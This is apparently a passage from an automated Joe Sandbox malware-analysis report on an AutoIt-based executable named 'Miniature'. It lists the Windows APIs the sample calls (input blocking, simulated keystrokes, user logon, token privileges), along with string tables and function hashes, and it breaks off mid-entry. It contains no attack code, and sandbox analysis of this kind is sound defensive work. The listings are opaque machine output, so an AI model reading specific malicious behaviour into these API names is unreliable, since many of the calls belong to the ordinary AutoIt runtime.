                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InputSendkeybd_event
                                                  • String ID:
                                                  • API String ID: 3536248340-0
                                                  • Opcode ID: f2825547eee90200d7438ac30c1c19a742b141e3e00c2519c27cda01163ceb83
                                                  • Instruction ID: 502b640c5e6d43327716edc0fe041f47032ca6bc7895c166e61f57ef691f031f
                                                  • Opcode Fuzzy Hash: f2825547eee90200d7438ac30c1c19a742b141e3e00c2519c27cda01163ceb83
                                                  • Instruction Fuzzy Hash: 3CF0497190020DEBDB10CF94C805BFE7BB4FF04315F10804AFA55A6292D37A9615DF94
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,01009B52,?,0102098C,?), ref: 00FFA6DA
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,01009B52,?,0102098C,?), ref: 00FFA6EC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: 32f917bc7fc5cfc4323f76990b32b39e6622da2d6dce4ed360891cbb9967db8a
                                                  • Instruction ID: 2d661888665328f32a88558b722e8c67d619b6a647160b682c95fedbae4aeb00
                                                  • Opcode Fuzzy Hash: 32f917bc7fc5cfc4323f76990b32b39e6622da2d6dce4ed360891cbb9967db8a
                                                  • Instruction Fuzzy Hash: FEF0823550422EBBDB30AFA4CC89FEA776CBF09361F008156F908D6195D6349944DBE1
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8F27), ref: 00FE8DFE
                                                  • CloseHandle.KERNEL32(?,?,00FE8F27), ref: 00FE8E10
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: c16ed6c86421c133ee2f8b0f7f9b90740f29174e923b90a37b301c35e68ca61b
                                                  • Instruction ID: c54e2ea9ae1a7a0e8578bd85b9b4de835e1332a3be31c1308c5de3fb5c12baf8
                                                  • Opcode Fuzzy Hash: c16ed6c86421c133ee2f8b0f7f9b90740f29174e923b90a37b301c35e68ca61b
                                                  • Instruction Fuzzy Hash: 1CE0B676010650EFE7362B61EC59DB77BADEB04360B248929F49A80474DB66AC90EB50
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FB8F87,?,?,?,00000001), ref: 00FBA38A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FBA393
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 8d7080d272a75c638349192b4c9a695462bf2ca76df78328eed2c4bb60305ae5
                                                  • Instruction ID: 6604ef4c6e912ce17774ea5ffeeb0dbeb994dc6339b039afe78cfa8170370d70
                                                  • Opcode Fuzzy Hash: 8d7080d272a75c638349192b4c9a695462bf2ca76df78328eed2c4bb60305ae5
                                                  • Instruction Fuzzy Hash: 9DB0923106430CEBCA602F91E809B8A3F6CEB44A62F108010F64D44458CBA754508B91
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 010045F0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 1608fdfee9cf6c13b9030811aeaf9ca9da7639d17b4dc86695cd3d8af51ea5cc
                                                  • Instruction ID: a373af0b2353fc56423c200eccde700cc9f1e35dbaa82bf4f2f6712304b3d465
                                                  • Opcode Fuzzy Hash: 1608fdfee9cf6c13b9030811aeaf9ca9da7639d17b4dc86695cd3d8af51ea5cc
                                                  • Instruction Fuzzy Hash: F7E0D8352002055FE711EF59D804E4AF7D8AF54760F008016FD45C7352DA75F9018B90
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00FF5205
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: 41e747b5eec9e6c3d4deeca6aec1a2f974913fca9e263d3209ed9852f60303ae
                                                  • Instruction ID: da080e5b3335fbecbd065bb7549390529b7e122c86a24ff643680c4f2039c5d5
                                                  • Opcode Fuzzy Hash: 41e747b5eec9e6c3d4deeca6aec1a2f974913fca9e263d3209ed9852f60303ae
                                                  • Instruction Fuzzy Hash: 22D05EA5560F0D78EC2807248E0FF361288EB01FD0F9441497342890E2ECD8F845B071
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FE8FA7), ref: 00FE9389
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: 22e21c8dd162287f29c665d9346c489a4737630bd3132471595d2656656e817e
                                                  • Instruction ID: af687b33483e826c366842cdd77900c79c8aabd6d1acb59acdfdad37f3c27698
                                                  • Opcode Fuzzy Hash: 22e21c8dd162287f29c665d9346c489a4737630bd3132471595d2656656e817e
                                                  • Instruction Fuzzy Hash: 59D05E3226060EABEF118EA4DC01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00FD0734
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 5b64ea40db4749272f16f67e66a1561388d15c00797c5f2c812405745fcd3b4d
                                                  • Instruction ID: dcf73273c134b7728c5a5bf697d538a0aa0086835b1628d4731eecc9c5dcf90e
                                                  • Opcode Fuzzy Hash: 5b64ea40db4749272f16f67e66a1561388d15c00797c5f2c812405745fcd3b4d
                                                  • Instruction Fuzzy Hash: 3CC04CF2800109DBDB15DFA0D588EEEB7BCAB04304F240056F145B2104D7789B449B71
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FBA35A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 35da2847e90ae977389da1561e18ac87499262f687ead200df715c3719886171
                                                  • Instruction ID: 8c5eeedb16316352a819e28a236d3f4e1353672088044d17b2b64802ca853061
                                                  • Opcode Fuzzy Hash: 35da2847e90ae977389da1561e18ac87499262f687ead200df715c3719886171
                                                  • Instruction Fuzzy Hash: 40A0223002030CFBCF202F82FC0888ABFACEB002A0B00C020F80C0002ACBB3A8208BC0
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,01020980), ref: 01013C65
                                                  • IsWindowVisible.USER32(?), ref: 01013C89
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: 288d090e66f82d5d9ffa0d3933f5f1f281e099a8d1aa0705f6ecc412925e9da8
                                                  • Instruction ID: 89977584efbcb14b87e301525744b3e928c224befe64eac588d2b942a814a8ab
                                                  • Opcode Fuzzy Hash: 288d090e66f82d5d9ffa0d3933f5f1f281e099a8d1aa0705f6ecc412925e9da8
                                                  • Instruction Fuzzy Hash: D6D1CE702043058BDB14EF15C981AAEBBE1BF94354F148468F9C65B2E6CF39ED0ADB81
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 0101AC55
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0101AC86
                                                  • GetSysColor.USER32(0000000F), ref: 0101AC92
                                                  • SetBkColor.GDI32(?,000000FF), ref: 0101ACAC
                                                  • SelectObject.GDI32(?,?), ref: 0101ACBB
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0101ACE6
                                                  • GetSysColor.USER32(00000010), ref: 0101ACEE
                                                  • CreateSolidBrush.GDI32(00000000), ref: 0101ACF5
                                                  • FrameRect.USER32(?,?,00000000), ref: 0101AD04
                                                  • DeleteObject.GDI32(00000000), ref: 0101AD0B
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0101AD56
                                                  • FillRect.USER32(?,?,?), ref: 0101AD88
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0101ADB3
                                                    • Part of subcall function 0101AF18: GetSysColor.USER32(00000012), ref: 0101AF51
                                                    • Part of subcall function 0101AF18: SetTextColor.GDI32(?,?), ref: 0101AF55
                                                    • Part of subcall function 0101AF18: GetSysColorBrush.USER32(0000000F), ref: 0101AF6B
                                                    • Part of subcall function 0101AF18: GetSysColor.USER32(0000000F), ref: 0101AF76
                                                    • Part of subcall function 0101AF18: GetSysColor.USER32(00000011), ref: 0101AF93
                                                    • Part of subcall function 0101AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101AFA1
                                                    • Part of subcall function 0101AF18: SelectObject.GDI32(?,00000000), ref: 0101AFB2
                                                    • Part of subcall function 0101AF18: SetBkColor.GDI32(?,00000000), ref: 0101AFBB
                                                    • Part of subcall function 0101AF18: SelectObject.GDI32(?,?), ref: 0101AFC8
                                                    • Part of subcall function 0101AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0101AFE7
                                                    • Part of subcall function 0101AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101AFFE
                                                    • Part of subcall function 0101AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0101B013
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: 3619f64af0668ae9093d427d5211cf95629be4d5793344fd128987499d0e17e0
                                                  • Instruction ID: 22e6daf97caf4996d3e69100cc2f899d467845d70f944b83b9d88ab3690bc919
                                                  • Opcode Fuzzy Hash: 3619f64af0668ae9093d427d5211cf95629be4d5793344fd128987499d0e17e0
                                                  • Instruction Fuzzy Hash: 25A1AD72109351EFD7619F64DC08A6B7BE9FF88321F200A19F9A2971D9C73AD844CB51
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00F93072
                                                  • DeleteObject.GDI32(00000000), ref: 00F930B8
                                                  • DeleteObject.GDI32(00000000), ref: 00F930C3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00F930CE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00F930D9
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FCC77C
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FCC7B5
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FCCBDE
                                                    • Part of subcall function 00F91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92412,?,00000000,?,?,?,?,00F91AA7,00000000,?), ref: 00F91F76
                                                  • SendMessageW.USER32(?,00001053), ref: 00FCCC1B
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FCCC32
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCCC48
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCCC53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: d231907360ca27e4ff81a4bb41e0fbb265f5d51aaa2b1b86cce3476a50db35ba
                                                  • Instruction ID: 7aa5057935ea11ca0885dcfc30703f318b34b62396bef02f47ad5de7eb8ee10b
                                                  • Opcode Fuzzy Hash: d231907360ca27e4ff81a4bb41e0fbb265f5d51aaa2b1b86cce3476a50db35ba
                                                  • Instruction Fuzzy Hash: 6912A030A00202EFDB24DF24C99AFA6BBA1BF44314F14456DF58ACB662C735EC55EB91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 2660009612-1645009161
                                                  • Opcode ID: 6869902f851dd5eff109e7cfbe0105b1b7fdae0290623507e55d4ec60cfc704e
                                                  • Instruction ID: 9f39e1d226b15f37135c35e1ab57f2c1b78be20bdd12c334bcdfa34b83c959c4
                                                  • Opcode Fuzzy Hash: 6869902f851dd5eff109e7cfbe0105b1b7fdae0290623507e55d4ec60cfc704e
                                                  • Instruction Fuzzy Hash: DEA1C271B40209ABCB24AF66CC82EBE3775BF56750F14002AF845AB252DB789E15FB50
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 01007BC8
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 01007C87
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 01007CC5
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01007CD7
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01007D1D
                                                  • GetClientRect.USER32(00000000,?), ref: 01007D29
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01007D6D
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01007D7C
                                                  • GetStockObject.GDI32(00000011), ref: 01007D8C
                                                  • SelectObject.GDI32(00000000,00000000), ref: 01007D90
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 01007DA0
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01007DA9
                                                  • DeleteDC.GDI32(00000000), ref: 01007DB2
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01007DDE
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 01007DF5
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01007E30
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01007E44
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 01007E55
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01007E85
                                                  • GetStockObject.GDI32(00000011), ref: 01007E90
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01007E9B
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01007EA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: be8c4bdb92403cb58081282790d107809f6017fc8f547553701551941c6bd675
                                                  • Instruction ID: 538a03e2f429cb5c2a7965a0228c2d43c1943f462de741d4f2a7e4e9b4f6b208
                                                  • Opcode Fuzzy Hash: be8c4bdb92403cb58081282790d107809f6017fc8f547553701551941c6bd675
                                                  • Instruction Fuzzy Hash: 57A17FB1A00219BFEB24DFA4DC4AFAFBBA9EB04710F144114FA55A72D4C779AD40DB60
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00FFB361
                                                  • GetDriveTypeW.KERNEL32(?,01022C4C,?,\\.\,01020980), ref: 00FFB43E
                                                  • SetErrorMode.KERNEL32(00000000,01022C4C,?,\\.\,01020980), ref: 00FFB59C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 852747cfae9bbd3433174afe85132ebd4bdaa0c5a1e32203ec9ff7c9cb9958ac
                                                  • Instruction ID: 56cd85b5632f17deee50a629899c40a9c4559c0d2b5230cca7d2895fb566d868
                                                  • Opcode Fuzzy Hash: 852747cfae9bbd3433174afe85132ebd4bdaa0c5a1e32203ec9ff7c9cb9958ac
                                                  • Instruction Fuzzy Hash: 0B519FB1B4020DEB8B10EF21C982A7977A0BF45750B3C402AE646EB265D73DEE45FB51
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0101A0F7
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0101A1B0
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 0101A1CC
                                                  Strings
                                                  Memory Dump Source
